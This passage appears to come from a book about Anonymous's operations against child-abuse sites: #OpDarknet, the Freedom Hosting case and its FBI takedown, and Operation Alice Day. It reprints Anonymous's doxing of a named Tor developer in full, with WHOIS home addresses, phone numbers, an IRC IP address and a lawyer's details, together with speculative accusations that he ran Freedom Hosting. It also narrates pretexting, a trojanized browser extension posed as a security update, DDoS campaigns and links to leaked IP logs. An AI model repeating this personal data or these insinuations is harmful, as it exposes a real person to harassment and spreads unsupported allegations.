CPA):
California Bar Number: 233521
Address:360 5th St, San Francisco, CA 94107
Phone Number: (415) 335-1206
Fax Number: (415) 276-9395
e-mail: [email protected]
County: San Francisco
Undergraduate School: Carnegie Mellon Univ; Pittsburgh PA
District: District 4
Sections: None
Law School: Golden Gate Univ SOL; San Francisco CA
Supporter: Electronic Freedom Foundation - http://eff.org
Opposes: H.R.1981 -
https://wfc2.wiredforchange.com/o/9042/p/dia/action/public/?
action_KEY=8175
Website: http://www.taxninja.com/
Facebook: http://www.facebook.com/taxninja
What we found was troublesome, a "tax" lawyer with no CPA and a degree in
"Social History and Japanese Language" from Carnegie Mellon? So we
decided to do a little call to this "tax" lawyer.
We pretended we Anon was the billing department at Applied Operations
LLC. We were able to convince Mr. "Tax" Ninja to help explain why a
company with a website with no business activity has 12 IP's and with a total
speed of 10 GB/s. Realizing that something was a muck, the Mr. "Tax" Ninja
dropped a name of "Mike Perry" from the Tor Foundation. From there things
got became clearer.
Name: Mike Perry
College: University Of Illinois at Urbana-Champaign
Current job: IT security Guru, author of Torbutton and Tor
Performance Developer
-> Author of TorFlow, a Tor controller that builds paths through
the Tor network and measures various properties and behaviors. Developer
and maintainer of Torbutton.
Source: https://www.torproject.org/about/corepeople.html.en
Tor Foundation website: https://blog.torproject.org/blogs/mikeperry
WHOIS for 'mikeperry' on Tor IRC developer network: irc.oftc.net
* [mikeperry] ([email protected]): Mike Perry
* [mikeperry] #cryptodotis #tor-bots #nottor #https-everywhere
#tails #tor-dev #tor
* [mikeperry] charm.oftc.net :Fremont, CA, USA
* [mikeperry] 216.224.124.114 :actually using host
* [mikeperry] is connected via SSL (secure link)
* [mikeperry] idle 00:58:36, signon: Thu Oct 13 20:57:31
* [mikeperry] End of WHOIS list.
Personal website: http://www.fscked.org
WHOIS: fscked.org
Domain ID:D8896750-LROR
Domain Name:FSCKED.ORG
Created On:07-Aug-1999 00:47:31 UTC
Last Updated On:08-Oct-2007 19:57:09 UTC
Expiration Date:07-Aug-2012 00:47:23 UTC
Sponsoring Registrar:Register.com, Inc. (R71-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:C2359198-RCOM
Registrant Name:Mike Perry
Registrant Organization:A Bunch of UNIX Geeks (ABUG)
Registrant Street1:409 E. Chalmers #907
Registrant Street2:
Registrant Street3:
Registrant City:Champaign
Registrant State/Province:IL
Registrant Postal Code:61820
Registrant Country:US
Registrant Phone:+1.2173655056
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:[email protected]
Admin ID:C36961674-RCOM
Admin Name:Mike Perry
Admin Organization:fscked.org evil labs
Admin Street1:117 W. Water St 1/2
Admin Street2:
Admin Street3:
Admin City:Farmer City
Admin State/Province:Il
Admin Postal Code:61842
Admin Country:US
Admin Phone:+1.2173906265
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:[email protected]
Tech ID:C36961678-RCOM
Tech Name:Mike Perry
Tech Organization:fscked.org evil labs
Tech Street1:117 W. Water St 1/2
Tech Street2:
Tech Street3:
Tech City:Farmer City
Tech State/Province:Il
Tech Postal Code:61842
Tech Country:US
Tech Phone:+1.2173906265
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:[email protected]
Name Server:DNS081.A.REGISTER.COM
Name Server:DNS193.B.REGISTER.COM
Name Server:DNS244.C.REGISTER.COM
Name Server:DNS249.D.REGISTER.COM
Network lookup of: fscked.org
 IP address: 216.224.124.114
Host name: fscked.org
canonical name: fscked.org
216.224.124.114 is from United States in region North America
Netblock owner of: 216.224.124.114
216.224.124.114 is from United States in region North America
Whois query for 216.224.124.114...
Results returned from whois.arin.net:
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=216.224.124.114?
showDetails=true&showARIN=false&ext=netref2
#
Formless Networking LLC FORMLESS-1 (NET-216-224-124-
112-1) 216.224.124.112 - 216.224.124.127
Ethr.Net LLC ETHRN (NET-216-224-112-0-1) 216.224.112.0 -
216.224.127.255
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
Results returned from whois.arin.net:
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;handle=NET-216-224-124-112-1?
showDetails=true&showARIN=false&ext=netref2
#
NetRange: 216.224.124.112 - 216.224.124.127
CIDR: 216.224.124.112/28
OriginAS: AS30490
NetName: FORMLESS-1
NetHandle: NET-216-224-124-112-1
Parent: NET-216-224-112-0-1
NetType: Reallocated
RegDate: 2009-05-12
 Updated: 2009-05-12
Ref: http://whois.arin.net/rest/net/NET-216-224-124-112-1
OrgName: Formless Networking LLC
OrgId: FORML
Address: 182 Howard St. #230
City: San Francisco
StateProv: CA
PostalCode: 94015
Country: US
RegDate: 2009-05-12
Updated: 2011-09-24
Ref: http://whois.arin.net/rest/org/FORML
OrgAbuseHandle: MPE194-ARIN
OrgAbuseName: Perry, Mike
OrgAbusePhone: +1-415-344-4441
OrgAbuseEmail: [email protected]
OrgAbuseRef: http://whois.arin.net/rest/poc/MPE194-ARIN
OrgTechHandle: MPE194-ARIN
OrgTechName: Perry, Mike
OrgTechPhone: +1-415-344-4441
OrgTechEmail: [email protected]
OrgTechRef: http://whois.arin.net/rest/poc/MPE194-ARIN
Website of: fscked.org
"For the past three or four years now I've led something of a double
life."
"By day, I'm a reverse engineer and developer at Riverbed
Technology. There, I'm part of a small team that reverse engineered and
accelerates the Microsoft Exchange email protocol, but the company does
much more than that, and I feel pretty safe saying I'm surrounded by some of
the brightest engineers on the planet. It's actually a pretty neat place. Not evil
(yeah, actually for reals), not (too) corporate, very fun staff, etc."
"But, by night, I do basically whatever I can to help improve
privacy, security, censorship resistance, and the ability for people to opt-out
(if only temporarily) of the massive surveillance apparatus that is now the
modern Internet."
"I work extremely hard at the things that are important to me, but at
the same time, I don't believe in taking anything too seriously, and have a
pretty cavalier outlook towards life in general."
"I also refuse to create a facebook account, a flickr account, a
livejournal account, a twitter account, and generally join the web 2.0 party. It
makes me sad in a way, because I really like parties, and I also really like
new technology, but the astounding amount of personal information these
places collect, sell, and use to target their users with ads and profiling i just
too much for me"
Development Language of fscked.org: PHP - Drupal
IT Security Papers by Mike Perry:
Securing the Tor Network -
"https://www.blackhat.com/presentations/bh-usa-07/Perry/Whitepaper/bh-
usa-07-perry-WP.pdf"
365-Day: Active Https Cookie Hijacking -
"http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-
perry.pdf"
Wait...... what???? Tor Button Developer, IT guru, PHP Developer,
Security + Hacker......., a side company belonging to Mike Perry running 12
Tor exit nodes????? What is going on here????? So we dug a little deeper.
Freedom Hosting and Hidden Services Design Talk:
http://www.bitchx.com/log/tor-o/tor-o-04-Feb-2010/tor-o-04-Feb-2010-
00.php
dun - but when it comes to PHP i'm concerned about security
problems (some script however shows the real server ip to the user and youre
screwed)
dun - at least i havent found any detailed information on that yet
dun - i'd really like to know how freedom hosting solved that
dun - (yes, i'm not into php at all)
nsa - or: mikeperry committed revision 21556 (/projects/todo):
nsa - or: Point out my consensus bandwidth weight branch is
ready for
nsa - or: review.
cheako - Does every exit node need to have access to the
hidden service?
cheako - dun: You can use port forwarding trickery so
apache and php think the servers address is 127.0.0.1
cheako - A handfull worked.
phobos - hidden services run within the tor network
phobos - they don't need exit nodes at all
phobos - and by within, tor clients can host hidden services as
well
Talk about Hidden Service IP enumeration bug fixes:
https://lists.torproject.org/pipermail/tor-commits/2010-February/009203.html
Modified: projects/todo/git-branches
============================================
--- projects/todo/git-branches 2010-02-03 19:40:57 UTC (rev
21555)
+++ projects/todo/git-branches 2010-02-03 22:55:46 UTC (rev
21556)
@@ -6,6 +6,9 @@
- Circuit Build Times control port events and consensus params:
mikeperry/cbt-status
We found ourselves confused.... stuff about hidden services, tor, a 'shell'
company named Formless Networking LLC owned/managed by Mike Perry
with no other business than Tor Exit nodes? Shall we look at our records of
data pull from our hacks against pedo fort, aka Freedom Hosting?
Freedom Hosting Server data phpinfo():
SERVER_SOFTWARE: Apache
SERVER_NAME: xqz3u5drneuzhaeo.onion
SERVER_ADDR: 10.0.1.2
SERVER_PORT: 80
REMOTE_ADDR: 10.0.1.2
http://fscked.org server data:
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
http://www.freedomnetworking.net server data:
Server: Apache
So......
1) Freedom Networking LLC has the Apache backend.
2) Freedom Hosting server has ngnix front cache to proxy a backend Apache
with PHP safemode on...
3) Tor Security expert who fixed hidden service IP enumeration bugs
4) Freedom Server has as business IP internal NAT of 10.0.1.X
5) Mike Perry quit Riverbed Technology for Tor in 2008 and Freedom
Hosting has a copyright of 2008. (Src: http://fscked.org/blog/farewell-
riverbed-so-long-and-thanks-all-bits) and
(http://s1.postimage.org/k8gmi740d/freedom.png)
6) Mike Perry run's 12 Tor exit nodes under a shell company under Formless
Networking LLC
7) Formless Networking LLC has a "tax" attorney with no CPA
8) Mike Perry designed Tor Button and is a major contributor to Tor Hidden
Node design: https://www.blackhat.com/presentations/bh-usa-
07/Perry/Whitepaper/bh-usa-07-perry-WP.pdf
9) Mike Perry has stated on his personal website "For the past three or four
years now I've led something of a double life"
We ask you Mike Perry, what do you have to hide behind your little "shell"
company? You have no Facebook, Twitter, or any data of you on the
clearnet, and the only facial data we have about you is a video about your talk
at Defcon 16. The only public data we have was obtained through your "tax"
lawyer. You are a major designer and architect of Tor Hidden services + the
Tor button.
You have the motive to hid any illegal activity such as hosting CP behind a
company. You hire an attorney to handle all matters regarding Tor through
this Formless Networking LLC. You know Tor enough, are an IT security
guru to able to lock down Freedom Hosting after launching 'The Legion' on
the server, you are probably the only one in the Tor Foundation that has the
technical knowledge to build a dynamic Tor .onion addressing hosting
service running on PHP aka Freedom Hosting.
We ask you Mike Perry. Why are you trying so hard to be Anonymous, like
us?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.
#OpDarknet—Paws Up: A Sticky Situation
#OpDarknet Official and Last Release -- 11/2/2011
In the last three weeks of #OpDarknet, we gained much support from The
World with our Operation Darknet. We would like to thank our supporters,
in #OpDarknet's cause. There also was a large amount of resistance from the
pedophile community claiming that Tor was their safe haven with messages
such as:
Hidden Wiki 'Hard Candy' section - October 20:
"To the vandals, you vandalize the page 1,000,000 times, we will
correct it 1,000,001. It will just go back and forth. We are here to stay. People
want to run DDoS attacks over tor and think it hurts us, it does. It is our GOD
given right that we can choose to have our sexual preferences for youth. It is
the same for the any other porn community. It is not what we choose to
become, it is who we are. You Anonymous aka #OpDarknet do not have the
right to censor us."
Operation Darknet was never intended to bring down Tor or the "darknets".
The only purpose of Operation Darknet was to reveal that a service like the
"Tor Project" has been ruined by the 1% using it for Child Pornography. The
rest, 99% consists of Chinese/Iran journalists, Government intelligence
fighting a secret war with Al-Qaeda, and us Anons who believe in the right to
Free Speech.
However, Child Pornography is NOT FREE SPEECH. We proved beyond
doubt, that 70% of users to The Hidden Wiki access the HARD CANDY
section, "a secret directory" used by the pedophiles to access sites like Lolita
City and The Hurt Site, a site dedicated to trade of child rape.
In that, We Anonymous planned and successfully executed an complex
"Social Engineering" operation dubbed "Paw Printing". This consisted of the
following things:
1) One week prior to October 27th, 2011, We Anonymous performed OpSec,
"Operations Security" against the developers of Tor. We quietly listened on
irc.oftc.net channels #tor and #tor-dev to find when the next major release of
Tor would be.
2) Form our OpSec, we determined that on October 27th 2011, a new Tor
version would be released to recent "security" publications about Tor
3) We secretly contacted our friends at The Mozilla Foundation™,
Developers of Firefox™, for them to authorize a developer signer certificate
for "The Honey Pawt", a TorButton that we Anon created to funnel all
ORIGINATING traffic to our forensic logger.
4) On October 26th, 2011 we passed certification of a modified TorButton for
Firefox™ called "The Honey Pawt" which would be used for the forensic
logging of users accessing The "HARD CANDY" and "Lolita City" Tor
Hidden Onion sites. Our TorButton aka "The Honey Pawt" did not contain
any malware or virus. It was developed according to the Firefox/Mozilla
Foundation guidelines.
5) We built a forensic data logger dubbed "Whiny da Pedo" that would
capture the IP traffic, log that IP packet, and re-route it through our local Tor
Bridge.
6) On October 27th, 2011 we launched Operation "Paw Printing". What we
did was stopped our #occupy Denial-of-Service on The Hidden Wiki and
placed a Tor "security update" message on the "HARD CANDY" section of
The Hidden Wiki.
7) No where else did we place that message except for the HARD CANDY
page on The Hidden Wiki. The message contained a download link to our
"The Honey Pawt". To ensure no conflicts with the existing, TorButton our
"The Honey Pawt" replaced the old TorButton Firefox extension.
8) The pedo who was on the "HARD CANDY" section would then restart
Firefox™ and turn our TorButton and attempt to access websites such as The
Hidden Wiki and Lolita City.
9) That traffic would then be forwarded to our special forensics server and
log the incoming IP and destination. If an Tor Onion site matched a known
Child Pornography Tor site, we would block the request. Otherwise, the
traffic would then be redirected through the Tor network.
10) For only 24 hours, we ran Operation "Paw Printing". On October 28th,
2011. We shut down the forensics and resumed #occupy The Hidden Wiki to
prevent access to the Tor Hidden Wiki Site
Below are mirrors to "whiny_da_pedo_ip_honey_pot.zip", the forensics
archive to our operation. A total of 190 unique IP's and users were identified
in the 24HR time frame. The README.txt contains the method of IP
capture and forensics used to determine the individuals accessing the HARD
CANDY and Lolita City.
IP Log Backup 1:
http://www.mediafire.com/?5291xw8fd76npdj
IP Log Backup 2:
http://www.mediafire.com/?xriuv723wbx466c
IP Log Backup 3:
http://www.mediafire.com/?6p7ph67gb4pyg82
An unique location mapping of these home IP addresses on Google Maps can
be displayed here: http://i.imgur.com/ggfVG.png
Also in addition to Operation "Paw Printing", we had an concurrent operation
called "Media Storm". We reconfigured our previous cluster used for timing
analysis against Freedom Hosting, to run multiple instances of "Chris
Hansen".
During our gathering of evidence against FORMLESS NETWORKING LLC
(see: http://pastebin.com/qWHDWCre). We ran multiple Denial-Of-Service
attacks against the Tor services Freedom Hosting and Lolita City. As for a
control to test our suspicions, we separately ran the high bandwidth
Distributed Denial-Of-Service attacks against the Tor exit nodes owned by
FORMLESS NETWORKING LLC a company affiliated with Mike Perry,
the developer of the TorButton.
Each and every time, we were able to verify outages to Freedom Hosting.
Those from our Tor network Denial-of-Service attacks directly against Lolita
City / Freedom Host (See: http://pastebin.com/VsWnRM70); And those with
clearnet/WWW Distributed Denial-Of-Service attacks against FORMLESS
NETWORKING LLC Tor exit nodes (See: http://torstatus.blutmagie.de).
One Anon contacted Mike Perry on the Tor developer's IRC server:
irc.oftc.net, about Anonymous' accusations about his association with
FORMLESS NETWORKING LLC. His response is as follows:
 [17:24] <mikeperry> I helped create that model. my llc was the
prototype for the 501c3
[17:26] <mikeperry> you really have no idea what the fuck you're
doing, do you?
[17:26] <mikeperry> and you've damaged my name, and damaged
the tor network
[17:26] <mikeperry> which you use
[17:26] <mikeperry> you know why I didn't reply to you for 2 days
on irc?
[17:26] <mikeperry> cause I was busting my ass working for a
deadline today
[17:26] <mikeperry> that you guys almost made me miss
[17:27] <mikeperry>
https://trac.torproject.org/projects/tor/wiki/org/sponsors/SponsorF/November2011
[17:27] <mikeperry> improving the load balancing of the network
you used to DDoS my website
[17:28] <mikeperry> you see this:
https://trac.torproject.org/projects/tor/ticket/1778#comment:22
[17:28] <mikeperry> your DDoS probably caused that
To the pedophile community, based on the evidence and forensics, that We
Anonymous gathered. There is no need for you to troll anymore,
mmmmkay? We have already ID'ed you despite "the myth" of Tor
"Anonymity". We "pwned" and "hacked" Freedom Hosting and Lolita City.
If your names for your sick trade consist of "lolita" and "pedo bear",
pedophiles are called "Britney" and "squealer" in jail. If you still don't
believe that we hacked Freedom Hosting? Roger Dingledine, one of the
original Tor developers said this on an irc chat, regarding our operations
against Freedom Hosting:
[01:09] <arma> even if you learn the secret key for a hidden
service, that doesn't tell you who the hidden service is. it only allows you to
impersonate the service.
[01:09] <arma> if they broke the key, my guess is they broke into
the server and then just took it.
The purpose of #OpDarknet was to collect evidence and prove that %1 of Tor
users who use Tor for CP are the ones causing the problems for the rest of the
Tor community, the 99%. In celebration of November 5th 2011, #OpDarknet
is officially sailing away for another Lulz. Bye bye pedo bear. We are
Anonymous, a leaderless collective, fueled only by our ideas. We give you a
last and farewell gift: http://i54.tinypic.com/120r1jc.jpg
Best, #occupywallstreet, #freeanons, #freetopiary, #antisec
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.
We "Anonymous are the hero The Internet deserves, but not the one it needs
right now. So we'll hunt them because they can take it. Because they are not
our heros. Anonymous is a silent guardian, a watchful protector. A dark
knight."
* Also pedos you may want to read: http://gawker.com/5851459
Final Word
News of Operation Darknet spread quickly in the media, with the earliest
news story appearing on the Examiner on October 20, Gawker on October
21, the Huffington Post and PC World on October 22, and Geekosystem on
October 23. The Examiner story was shared on Reddit on October 22, where
it received 2475 points in two days. By October 24, the news had reached the
Wall Street Journal, Information Week, and the BBC. Techie Buzz also
published an interview with a user named "arson" in the #OpDarknet IRC
channel. Arson stated that their mission was only to take down illegal
materials and the operation was not triggered by any particular event:
“We vowed to fight for the defenseless, there is none more
defenseless than innocent children being exploited.”

And in August 2013, the FBI would arrest the alleged owner of Freedom
Hosting—Eric Eoin Marques—who they called the “largest facilitator of
child porn on the planet.”
 4
ERIC EOIN MARQUES: "KINGPIN OF CHILD PORN"
On August 3, 2013, at around 6:40 am ET, every website hosted on Freedom
Hosting went down simultaneously. By this time, Eric Eoin Marques had
already been arrested, and news of his arrest sent shockwaves around the
internet. It was alleged that Marques supplied the computer infrastructure for
Freedom Hosting—the infrastructure that allowed sites to operate
anonymously, including child porn sites such as Lolita City, The Love Zone,
and PedoEmpire. Freedom Hosting also provided services for money-
laundering operations and fraud forums like HackBB, as well as encrypted
email systems like the hugely popular TorMail.

Prior to the arrest of Eric Eoin Marques in August 2013, it was unknown who ran Freedom Hosting,
the largest host of child pornography on the planet.
The charges in Marques’ criminal complaint include conspiracy to advertise
and distribution of child pornography. The FBI referred to Marques as the
“largest facilitator of child porn on the planet,” and claimed that over $1.5
million cleared Marques’ bank accounts in the year running up to his arrest.
Once Marques was arrested, the National Security Agency (NSA) infected
numerous websites hosted on Freedom Hosting with a JavaScript exploit
allowing agents to identify users by grabbing their cookies, logins, and IP
address to send “home”—which, in this case, is the Verizon-owned IP
address 65.222.202.53. The previously unknown exploit only affects Firefox
version 17, which is exactly the version Tor uses.

A zero-day vulnerability in Firefox 17 was used by the FBI to identify some users of the privacy-
protecting Tor anonymity network. The FBI did not compromise the TOR network itself and The
complex multi-layers of encryption still stand. Instead, the FBI compromised the TOR browser only
using a zero-day JavaScript exploit and used this to implant a cookie which fingerprinted users through
a specific external server.
Cybersecurity experts tracked the attack back to Science Applications
International Corp—a Virginia-based contractor for the NSA. They
apparently exploited a previously unknown vulnerability in Firefox version
17-the Tor Browser is built on the Firefox Web browser-that allowed them to
identify the true internet addresses and computer names of people using Tor
Browser to visit the child porn sites at Freedom Hosting.
An administrator of the infamous 4Pedo forum noticed “unknown Javascript”
on his own website on the same day:
Unknown Javascript in the board pages pointing to iframe to a
Verizon server on the open web!” wrote 4Pedo’s owner. “They are
inserted by Freedom Hosting! I would consider Freedom Hosting
compromised! They are also in other TLZ and other site pages! Stay
away from all Freedom Hosting sites including TLZ [The Love
Zone], LC [Lolita City], TorMail, all of these are hosting on
Freedom Hosting! All boards have been deleted to protect you! If the
boards come back up, it is not met running the site anymore! All
admin/mod accounts have been deleted!
The Javascript exploits are now widely assumed to have originated from the
FBI or Verizon have been posted publicly on Pastebin at:
https://pastebin.com/pmGEj9bV
The complaint said Marques was suspected of operating a free, anonymous
web hosting service on a network allowing users to access websites without
revealing their IP addresses. He is wanted on four charges linked to child
porn sites like Lolita City and PedoEmpire, which the FBI says were
extremely violent, graphic, and depicting the rape and torture of young
children.
For years Freedom Hosting had developed a reputation as a safe haven on the
Dark Web for hosting child porn. According to the FBI, Marques operated
Freedom Hosting as a turnkey solution for websites that hide their true
location using Tor. Freedom Hosting’s appeal for some of its clients was its
promise not to look in on the websites it was hosting, though it stated that
downloading illegal content was not allowed. However, it added: “If you
choose to do so anyway, we are not responsible for your actions.”
This was taken as permission to host illegal content, which flourished on
Freedom Hosting, including child pornography sites. Famous child
pornography websites such as Lolita City, the Love Zone, and PedoEmpire
were customers of Freedom Hosting but so were journalists, human rights
activists, and whistleblowers.
Freedom Hosting maintained servers for some of Tor’s most famous
websites, including TorMail, long considered the most secure anonymous
email operation online; major hacking and fraud forums such as HackBB;
large money laundering operations; the Hidden Wiki, which, was the de facto
encyclopedia of the Dark Web; and virtually all of the most popular child
pornography websites on the planet, the charge that landed Marques in
custody.

Freedom Hosting’s entry on the Tor network’s The Hidden Wiki page before it was shut down by the
FBI in August 2013.

So how did the FBI identify Eric Eoin Marques as the owner of Freedom
Hosting? The extensive search for the owner of Freedom Host required
cooperation from the US, French, and Irish state. Ultimately, the FBI located
Marques by following a US bank account, a Las Vegas post box, and a
French internet company before tracing him to Dublin.
The details of how Marques was uncovered as a suspect are contained in
court documents in which FBI special agent Shanna Daniels described how
the FBI was investigating anonymous web-hosting of child abuse images in
2012 and 2013, which in turn, likely has its roots dating back to Anonymous’
Operation Darknet.
Operation Darknet in October 2011—almost 2 years prior to the arrest of
Marques—involved some of Anonymous’ most notable members. Sabu
(Hector Xavier Monsegur), the Bronx-based hacker, LulzSec founder and
FBI informant was one of the principal organizers of Operation Darknet,
leading many to wonder to what extent the FBI had knowledge of those Dark
Net raids. Sabu became an FBI informant in August 2011 after pleading
guilty to a dozen criminal counts, reported the New York Times. Operation
Darknet was executed in October 2011.
At the very least, the FBI was fully aware of the Anonymous attacks on
Freedom Hosting in 2011 and allowed Anons to proceed. The question is,
how involved was the FBI in Operation Darknet if Sabu was, at that point, a
puppet doing the FBI’s bidding?
It is believed by some cybersecurity experts, that Anonymous’ hack of
Freedom Hosting during Operation Darknet in 2011, subsequently led to the
FBI accessing two websites hosted on Freedom Hosting in 2012 and 2013.
According to court documents, an FBI team based in Maryland connected
with the abuse network in which Marques was hosting two child exploitation
websites.
Website A was a bulletin board. It had 7,712 members, 22,230 posts and
2,192 topics relating to child abuse and violent child sexual abuse. Website B
contained almost 1.4 million files of abuse. FBI investigators downloaded
more than a million of these images. According to the special agent, during
2013 the FBI finally identified a computer address running the anonymous
network and the two websites.
Website A, in this instance, is a reference to one of the largest child
exploitation forums at the time called 4Pedo. Website B was Lolita City.
The computer address was discovered to be associated with a web-hosting
company in France. Following a request to French authorities, subscriber
information and business records were obtained from the company. The FBI
allegedly discovered that a single subscriber, Eric Eoin Marques, had a
contract with the company to use the server. Investigators also discovered
Marques paid for this using a debit card in his own name—from a US bank.
A Las Vegas mailbox was provided as the billing address, but further
investigation revealed mail to that address was being forwarded to Marques’
apartment in Dublin.
Ironically, Marques had officially launched “Onion Bank” only a month prior
to his arrest that would have made commerce on the Dark Web—and
Freedom Hosting —totally anonymous.
Before Operation Darknet in 2011, Freedom Hosting offered hosting to the
public for a small price. After the Anonymous attacks, Freedom Hosting
became a private, invite-only service for a full two-year period in order to
protect itself. To become a Freedom Hosting customer, you had to be invited
by someone who was already a customer.
Freedom Hosting invites were highly prized for the full two years they
existed. Invites were common topics of conversations on every popular onion
forum. Many members asked or even begged for invites while others offered
money.
But a month before Marques’ arrest and Freedom Hosting was shut down,
after two years, Freedom Hosting changed its policy drastically. The service’s
founder said he’d always wanted to bring the service public once again but
that he didn’t have an e-commerce platform secure enough to operate the
risky business. “I created Onion Bank,” announced the founder in July 2013,
“which has been in (slow) development for almost two years!”
Onion Bank offered all the services of a normal bank plus escrow, merchant
services, money laundering, and above all, it would handle everything
anonymously. On the back of this Bank, Freedom Hosting went public once
again, offering anonymous onion hosting to whoever could pay for it. The
Bank caught the attention of many Dark Web businesses, but it’s impossible
to say how widely it was adopted in its month of existence.

Final Word
Freedom Hosting hosted hundreds of despicable websites, many of them used
to conduct illegal activities taking advantage of the anonymity provided by
Tor network. Tor network contains in fact many services that are used by
cyber criminals for money laundering, exchanging of child porn material,
renting for hacking services and sale of drugs and weapons.
Freedom Hosting offers hosting services to hacking sites such as HackBB
and at least 550 servers throughout Europe that distributed child porn content.
FBI Supervisory Special Agent Donahue revealed that the Freedom Hosting
service hosted at least 100 child porn sites providing illegal content to
thousands of users, and claimed Marques had visited some of the sites
himself. (Marques had little to no involvement in the administration of the
majority of the sites hosted by Freedom Hosting. The government focused
entirely on child pornography crimes.)
On February 6, 2020, Eric Eoin Marques pleaded guilty to operating a web
hosting service that allowed users to anonymously access hundreds of
thousands of child abuse images and videos. Marques, a dual citizen of the
US and Ireland, had remained in custody since his August 2013 arrest in
Dublin after an extradition request from the US. He was living in Ireland at
the time of his arrest. The server that he used was in France.
Marques was extradited from Ireland to Greenbelt, Maryland in April 2019,
and was indicted on four counts: conspiring to advertise child abuse images,
conspiring to distribute child abuse images, advertising child abuse images
and distribution of child abuse images.
The plea agreement does not give him credit for the nearly six years he spent
in custody in Ireland. Marques, 34, faces a mandatory minimum of 15 years
in prison and a maximum of 30 years after his guilty plea to one count of
conspiracy to advertise child abuse images. A plea agreement will ask the US
district judge Theodore Chuang in Maryland to sentence Marques to 15 to 21
years in prison, but the judge is not bound by the recommendation. Marques
can withdraw his guilty plea if the judge departs from that recommended
range.
“Did you do the things the government said you did?” the judge asked
Marques after a prosecutor read aloud a summary of the case against him.
“Yes,” Marques said.
Marques admitted that between July 2008 and July 2013, he operated an
anonymous web hosting service on a network on the Dark Web known as
Freedom Hosting. The service allowed users to access view and share images
of child pornography without disclosing their IP addresses, thus remaining
anonymous and untraceable. Of the 8.5 million images or videos hosted on
the server, nearly 2 million involved victims not previously known to law
enforcement. Images included the abuse of “prepubescent minors, violent
sexual abuse and bestiality,” prosecutors said.
 5
ANONYMOUS: OPERATION ALICE DAY

April 25 is unofficially “Alice Day,” a public “pedophile pride” day inspired

by the relationship between the author Lewis Carroll and his young muse,
Alice Liddell, for whom Alice in Wonderland was written. It was on that day
in 1856 when Carroll met 4-year-old Alice, sparking a lifelong infatuation. In
one pedophile’s own words, republished on a predator watchdog site, April
25 is a day to “rejoice in the gift of girllove and affirm the ideal so aptly
typified by this special relationship.” These men claim they would never
physically abuse or rape a child; it would be anathema to the childlove
philosophy. They want to cuddle, kiss, hold, and otherwise express their
affection for children—and if they can’t in person, they’ll do it from a
distance, emboldened by Alice Day.
In 2013, “Aladdin Truelove” claims to have coined the term 15 prior:
I am the one who suggested the name “Alice Day,” way back on
Ianthe’s email list, in 1998. Feels good to be back in the land of the
living!
In 2018, Aladdin Truelove was still enjoying Alice Day on April 25
https://annabelleigh.net/messages/723958.htm
 Aladdin Truelove’s follow-up post a few days later on GirlChat
https://annabelleigh.net/messages/723994.htm

GirlChat (where Aladdin Truelove posted) is one of the more popular pedophile chat forums—and was
one of the 33 targets during OpAliceDay.
https://annabelleigh.net/

On numerous such forums, where adult men chat publicly about their love
and affection for young girls and boys, users post about how they plan to
celebrate Alice Day—often by wearing pink and spending time in parks to
“LG (little girl) watch.” Some even hand out pamphlets about “childlove” in
an attempt to decrease stigma against CL and raise awareness of what to them
is a significant social movement: pedophile pride.
During OpAliceDay on April 25, 2013, Anonymous attacked a long list of
online targets with DDoS attacks, leaking suspects’ personal information, and
defacing their websites. The hacker group gave fair warning of their intent on
YouTube:
https://www.youtube.com/watch?v=K2wOVHN6ezA
Greetings world. We are Anonymous “Report A Pedo.”
April is child abuse awareness month, and coincidentally it is also a
month in which child rapists, molesters and abusers celebrate a
particular holiday. On April 25th, abusers worldwide celebrate the
holiday “Alice Day,” named after Alice Liddell and, “Alice In
Wonderland,” originally Pedophile Pride Day. On this holiday the
pedophiles celebrate, rape and molestation of little girls. Many
pedophiles believe it is okay for them to celebrate loving a female
child that day.
We call upon all Anonymous Operatives to come forward and march
with us as legion to deface and cause chaos within the pedophile
networks.
To the public: On April 25th we will be conducting various
operations involving online methods such as distributed denial of
service attacks, doxing, and website defacement. We ask that you
please watch your children and be extra vigilant, because April 25th
is like Christmas to them.
We Are Anonymous.
We are legion.
We do not forgive.
We do not forget.
Expect us.
Anonymous released its full list of targets, explaining their system in a
Pastebin doc:
Each website got a Number. @ReportApedo will tweet when to go
pew pew on a certain website using its number to identify it. Feel
free to deface, dos/DDos, hack these websites whenever you want to.
But when firing we need everyone to fire at the same target at the
same time. Additional targets might be added and everybody will be
notified. We will start attack right at 01:00:00 p.m. Thursday April
25, 2013 in GMT. … The Op will continue all day and we will be
posting our old d0xes on pedos in addition to TangoDowns and
